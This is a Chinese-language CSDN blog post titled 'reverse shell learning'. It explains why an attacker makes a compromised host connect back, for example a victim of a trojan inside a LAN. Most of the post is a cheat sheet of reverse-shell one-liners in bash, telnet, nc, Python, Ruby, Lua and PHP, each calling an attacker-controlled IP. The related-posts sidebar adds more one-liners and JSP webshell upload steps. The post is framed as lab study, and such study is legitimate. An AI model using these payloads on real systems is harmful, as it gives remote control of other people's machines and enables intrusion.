反弹shell学习

最新推荐文章于 2024-05-26 22:29:50 发布
最新推荐文章于 2024-05-26 22:29:50 发布
阅读量362 收藏
点赞数
文章标签: 网络 linux shell kali linux unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45766062/article/details/121013851
版权

什么是反弹shell

反弹shell就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转,简单来说就是你作为tacker想连接到受害者电脑上,然后受害者主动发送了一个连接要求给你。

为什么要反弹shell

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

有如下情况:
1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。
2.目标机器的ip动态改变,你不能持续控制。
3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。
4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。
那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

Bash反弹shell

攻击者主机上进行监听:
在这里插入图片描述

然后在受害者主机上执行:

bash -c "bash -i >& /dev/tcp/IP/prot 0>&1"

这里因为我的目标主机是一台kali虚拟机,执行bash反弹时需要在bash中执行,通常的bash反弹指令为:

bash -i >& /dev/tcp/IP/prot 0>&1

可以看到攻击机已经连接到了目标靶机:
在这里插入图片描述

简单解释下:
(1)bash -i 打开一个交互的bash。
(2)>& 将标准错误输出重定向到标准输出。
(3)/dev/tcp/ip/port 意为调用socket,建立socket连接,其中ip为要反弹到的主机ip,port为端口。
(4)0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互。

注意:
/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。但是如果你尝试这届访问/dev/tcp你会发现它是不存在的。

linux shell下常用的文件描述符是:
1.标准输入 (stdin) :代码为 0 ,使用 < 或 << ;
2.标准输出 (stdout):代码为 1 ,使用 > 或 >> ;
3.标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>。
另外由于不同Linux发行版之间的差异,该命令在某些系统上可能并不适用。

telnet反弹

1.通过mknod命令反弹shell

mknod a p;telnet IP port 0<a | /bin/bash 1>a

攻击机:
在这里插入图片描述
目标机:
在这里插入图片描述

2.通过在攻击机上监听两个端口来实现telnet反弹

分别在攻击机上监听一个,输入和输出窗口

nc -l 6666//输入命令
nc -l 7777//输出内容

在目标机上执行:

telnet ip port1 | /bin/bash | telnet ip port2

目标机:
在这里插入图片描述
攻击机:
在这里插入图片描述

在这里插入图片描述

nc反弹

第一种

nc -e /bin/bash x.x.x.x port

第二种

rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f

第三种

nc x.x.x.x 9999|/bin/bash|nc x.x.x.x 8888

python反弹

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Ruby反弹

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","9999");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua反弹

lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','9999');os.execute('/bin/sh -i <&3 >&3 2>&3');"

PHP反弹

php -r '$sock=fsockopen("x.x.x.x",9999);exec("/bin/bash -i <&3 >&3 2>&3");'
KKKKKento
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反弹shell资源:Rust实现的简单反弹Shell例子
05-18
在IT安全领域,反弹Shell是一种常见...总之,Rust实现的反弹Shell示例是一个学习网络通信、权限控制和安全编程的好机会。理解并实践这些概念不仅可以帮助你更好地保护系统免受攻击,也可以加深你对Rust编程语言的理解。
Bash基础
个人博客:busyops.com
02-07 1584
BASH 一、 bash基础特性: 命令历史:history,读取内存中的命令历史。 (1) 环境变量:定制history特性。 HISTSIZE:命令历史记录的条数; HISTFILE:定义history命令历史的保存位置,默认为~/.bash_histroy。 HISTFILESIZE:命令历史文件记录历史的条数; HISTCONTROL:命令历史记录方式; a) ignoredups:忽略连续且相同的命令; b) ignorespace:忽略以空白字符开头的命令; c) ignoreboth:上
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1151
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell详细易懂讲解,看这一篇就够了
最新发布
LCW991207的博客
05-26 1377
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
反弹bash shell解释
-
03-15 689
反弹bash shell
反弹shell初识
无痕的博客
11-01 3993
反弹shell的指令与演示
反弹shell
soldi_er的博客
04-16 3296
文章目录反向连接的概念反向连接命令命令分析Linux符号知识本地测试实战记录参考 反向连接的概念   反弹shell,是指目标向服务器端口发起请求,发送目标shell命令行的输入输出,服务器通过监听端口来获得请求内容。reverse shelltelnet、ssh等标准shell对应,本质上是网络概念的客户端/服务端的角色反转。   为什么不正向连接?通常用于连接目标机器防火墙受限、权限不足、端口被占用等情形。正向连接,包括远程桌面、Web服务、ssh、Telnet等。 反向连接命令 命令分析   示例
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,...
反弹shell的各种姿势.pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
hershell - Go语言反弹Shell后门.zip
07-18
在IT安全领域,反弹Shell是一种常见的恶意软件技术,它允许攻击者通过受害者的系统控制远程服务器。本案例中,我们关注的是一个名为“hershell”的Go语言编写的反弹Shell后门程序。Go语言,也被称为Golang,是Google...
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6043
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
反弹shell的方式
qq_44882633的博客
05-27 234
bash -c 'exec bash -i &>/dev/tcp/1.1.1.1/8899 <&1' rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1.1.1.1 8899 >/tmp/f php -r '$sock=fsockopen(getenv("1.1.1.1"),getenv("8899"));exec("/bin/sh -i <&3 >&3 2>&a
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9387
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2391
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
反弹Shell的基本操作
weixin_46831054的博客
11-26 993
反弹shell定义: 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shelltelnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连
信息安全技术(二)-- 利用 metasploit 创建并反弹 shell
yi23456qi的博客
06-19 463
知识是不断从学习中得到的,经验是从尝试中得到的!
Windows10与虚拟机win7在vmnet1(仅主机模式下)使用nc进行反弹shell练习
m0_47402792的博客
01-07 439
Windows10与虚拟机win7在vmnet1(仅主机模式下)使用nc进行反弹shell练习
10种反弹shell方式
kevinhanser
03-30 4886
参考链接1:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 参考链接2:https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html 10种反弹shell方式 2019年3月30日【原创】 bash perl py...
windows 反弹shell_怎么反弹shell(reverse shell
weixin_39956451的博客
11-19 2130
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。正向连接:我们本机去连接目标机器,比如ssh和mstsc反向连接:目标机器去连接我们本机那么为什么反向连接会比较常用呢目标机器处在局域网内,我们正向连不上他目标机器是动态ip目标机器存在防火墙然后说一下我的实验环境虚拟机采用nat模式攻击机:Kali Linux :...
jsp 反弹shell
09-14
对于jsp反弹shell的过程,可以按照以下步骤进行操作: 1. 首先,在网页端登录进管理后台,上传jsp后门文件。具体的上传步骤可能因系统不同而有所差异,但一般可以在管理后台找到文件上传功能。上传后门文件的目的是为了获取控制目标主机的权限。 2. 上传jsp一句话木马文件(也可以是其他类型的木马文件)。这可以通过执行如下命令实现:`jar cvf shelloneword.war shelloneword.jsp`(其中,`shelloneword.jsp`是一句话木马文件的名称)。上传成功后,可以在管理后台确认文件已被上传。 3. 修改木马文件中的IP地址和端口号。在木马文件中,将IP地址和端口号改为你自己的IP地址和监听端口。这个监听端口是用来接收反弹shell连接的。 4. 打开网络监听工具(如nc),在监听端口上启动监听。例如,可以通过执行`nc -lvp 7777`命令来监听端口7777。 5. 访问上传的jsp木马文件。通过浏览器访问`http://目标主机IP地址:端口/shelloneword/shelloneword.jsp?i=bash /shell.sh`(其中,目标主机IP地址是指目标主机的IP地址)。 6. 如果一切顺利,你应该能够通过木马文件成功反弹shell连接。在网络监听工具上,你将看到与目标主机的shell连接。 需要注意的是,这个过程仅供学习和了解安全问题,不应用于非法用途。 参考资料:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值